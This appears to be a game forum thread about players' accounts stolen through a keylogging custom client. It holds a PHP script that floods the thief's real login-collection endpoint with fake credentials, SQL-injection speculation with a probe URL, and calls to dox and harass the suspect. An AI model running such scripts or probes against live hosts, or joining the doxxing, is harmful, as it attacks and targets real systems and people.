The Fate of Account Thieves (Portgas&co)

[BruThoL]

I'm surprised no-one has posted this yet, but this seems to be the perp: http://www.whois.net/whois/silmaril.biz.
It's the info circulated on IRC. The offending code looked like this according to the people on IRC (his code might even be susceptible to SQL injections, I am not a script kiddie though, so I wouldn't know how to perform them in a systematic way).
As people have already said, seems like a total script kiddie.

Do some detective work fellas and we'll call his mom as burgingham suggested.

Click here to send him a Christmas card.

It's not sql injection. It's social engineering.

Well, thanks to my programmer, he's come up with a full analaysis. The client is indeed bugged with a keylogger. The .jar file has a bootstrap. Basically, you log in as always, your password goes to a database. Which is what the russians are using to hack your account. It's a dirty trick indeed. Fortunently, there's a way to reverse the the hack. For those of you who actually downloaded the .jar file, you have to re compile the .jar file. This should remove it.
Nice try AD. You suck so bad for this. Your definently the reason why russians have a bad reputation in this community. Once again, nice job Dis.

Am I your programmer? Because i said all of this to you actually.

And recompiling isn't enough, need to remove the GET request first.

PM me on skype. Also, that's part of it I forgot to add.
Edit: if you want to see the whole fight and pictures from the raid, its on the russian forums . A lot of pages but worth it.
http://translate.google.com/translate?h ... 3Ft%3D4866

I am actually busy with trying to keep somewhat a village.
Our LS account still owned by them, and they are actually planning on destroying everything it seems.

[Galthon]

Nah, what he was saying is that the URL the GET is sending to might be vulnerable to an SQL injection, depending on how much sanitizing/sanity checking he's doing on the input.

[BruThoL]

Nah, what he was saying is that the URL the GET is sending to might be vulnerable to an SQL injection, depending on how much sanitizing/sanity checking he's doing on the input.

Which is hard to know because the web page doesn't send any data.
Also, who knows if there is a SQL db in background? They could simply be sending mails with login / pass (Actually i would do that).

[Tonkyhonk]

I've been telling them ages ago that they should pull the plug if they don't have time to work on the game. I'm afraid it's too late, the damage done to the community by exploiters is too great to be reversed, and it will remain a cesspool even if the updates resume. This account theft thingie may be bad, but I think it's just a small glimpse of things yet to come.

i do get the point of you all mods saying this, but, unless devs want to keep only the few from the inner circle and dont care about others, pulling the plug is another way to damage the community more or less. of course, i can assume that maybe you guys and devs dont need us to keep this game going and be content with just the select few, though.

this account theft is bad indeed, but those who downloaded the unknown client should have known what internet does.
the damage this time does not sound as bad as you all say, at least, to me. it has already been broken somewhat... many of us are aware of it and still playing, except for some new comers and some others who dont read forums. its starting to sound like you guys want all of us to stop playing so badly and obey you for your satisfaction. sorry, but i still want to be connected to this game and some people i got to know. and i choose to play as long as devs have it up for us to play.

worse things may be yet to come, and more people may decide to stay away. but games which stopped accepting people have harder times getting them back in general. (and i know this game is out of such category of games wanting more players. but still.)

*edit*
jorb and loftar are pretty good at breaking my heart, they have done so twice already.
maybe third time comes as they read these and you get them do what you want them to do. then banzai for you.

[BruThoL]

Code: Select all

<?php
$i=0;

while(1){
   $i++;

   $login = substr(str_shuffle(str_repeat('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789',5)),0,5);
   $pass = substr(str_shuffle(str_repeat('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789',5)),0,5);

   file_get_contents("http://silmaril.biz/checker.php?a=$login&p=$pass");
   
   if($i%10==0){echo "$i request sent.\n";}
   
   sleep(0.3);
}

?>


Here is a simple php script to send them some login/passwords.

[Potjeh]

I don't mean making the server invite-based, I mean having no server at all. Yes, it would completely dissipate the community. But no community is better than this community.

Back in the day we fought each other and we cared about winning, but the number one priority was improving the game itself. And that's how it should be, because the very reason we're allowed to play this is to help J&L develop the game by providing them with feedback. Nowadays, though, it's winning at any cost, even if it means actively hindering the development by providing garbage feedback. Thus, the playerbase has become worse than useless as playtesters.

It may not be a problem now because the game isn't really being developed ATM, but should the development resume it will become a major problem. The current playerbase culture is only going to get worse by then, and the community will be far too tainted to provide feedback on these new developments. The real problem is that this taint quickly spreads to newcomers, so it'll keep going even after all the current players are gone. Which is why I think that disbanding the current community altogether and starting a new one on a fresh slate when development resumes is the best option for the game.

[Tonkyhonk]

feedback is feedback.
garbage or not is the dev's decision and not any of ours.
selfish play may not give them much insight, but all these horrible events do give them some thoughts, im sure.
it takes up more devs time because many ot those selfish players dont give all info on what they were doing.
they can still see the worst case scenarios from the already broken game where players are aware of not much (or not at all) fixing coming in.

[bmjclark]

I think a few account / town / char nukes would go a long way considering it always seem to be the same group of people pulling this account stealing, server crashing shit

[Patchouli_Knowledge]

I don't mean making the server invite-based, I mean having no server at all. Yes, it would completely dissipate the community. But no community is better than this community.

Back in the day we fought each other and we cared about winning, but the number one priority was improving the game itself. And that's how it should be, because the very reason we're allowed to play this is to help J&L develop the game by providing them with feedback. Nowadays, though, it's winning at any cost, even if it means actively hindering the development by providing garbage feedback. Thus, the playerbase has become worse than useless as playtesters.

It may not be a problem now because the game isn't really being developed ATM, but should the development resume it will become a major problem. The current playerbase culture is only going to get worse by then, and the community will be far too tainted to provide feedback on these new developments. The real problem is that this taint quickly spreads to newcomers, so it'll keep going even after all the current players are gone. Which is why I think that disbanding the current community altogether and starting a new one on a fresh slate when development resumes is the best option for the game.

It is not always to possible to solve the matter by simply wiping the slate clean. Something will return when the slate returns. Giving this instance, loftar may end up with a reputation as a developer in which exploits will not be punish and when he opens the server once more, some of the ones that had caused the game to be shut down may return to do so again. Even then, wiping the slot clean doesn't mean the problem won't appear again. People will always exploit something for personal gain and unless you establish a firm policy on this issue, you will see the same issue rise with only difference between other people. As a developer, you will always face this problem and need plans on how to deal with it. It is very easy to shift the blame onto those that ran a custom client but that doesn't solve the issue that these people are performing it unhindered and they will grow bolder and develop something that will affect you that no amount of caution will solve, such as intentional crashing of the server or even compromising the integrity of the game itself.

Also, simply not running another client won't always prevent you from being wiped out. Social engineer plays a role in being able to manipulate the mind into performing actions that will not be out of their range of ethics and standard but still into territories that you want. If it can easily be used in a major faction, it can also be applied to a degree to spreading a client. If someone had planned to screw with the entire community from the beginning , he could have been benign for a very long time and provide all of us with quality client features for a very long time. Then an authentication problem arises and he releases his next patch to rectify this which turns out to be a keylogger. I would suspect a majority of the population here would end up being affected. How to counter against this possibility? The default client.

[ArvinJA]

Nah, what he was saying is that the URL the GET is sending to might be vulnerable to an SQL injection, depending on how much sanitizing/sanity checking he's doing on the input.

Which is hard to know because the web page doesn't send any data.
Also, who knows if there is a SQL db in background? They could simply be sending mails with login / pass (Actually i would do that).

He's at least using mysql_real_escape_string() to sanitize his input as we can learn from this: http://silmaril.biz/checker.php?a[]=azd&p=azd
However, I don't think he separates user input and SQL (by using prepared statements), so there's probably ways for people to SELECT his entire table and perhaps do something with it, maybe output it in an error, I don't usually do these things though.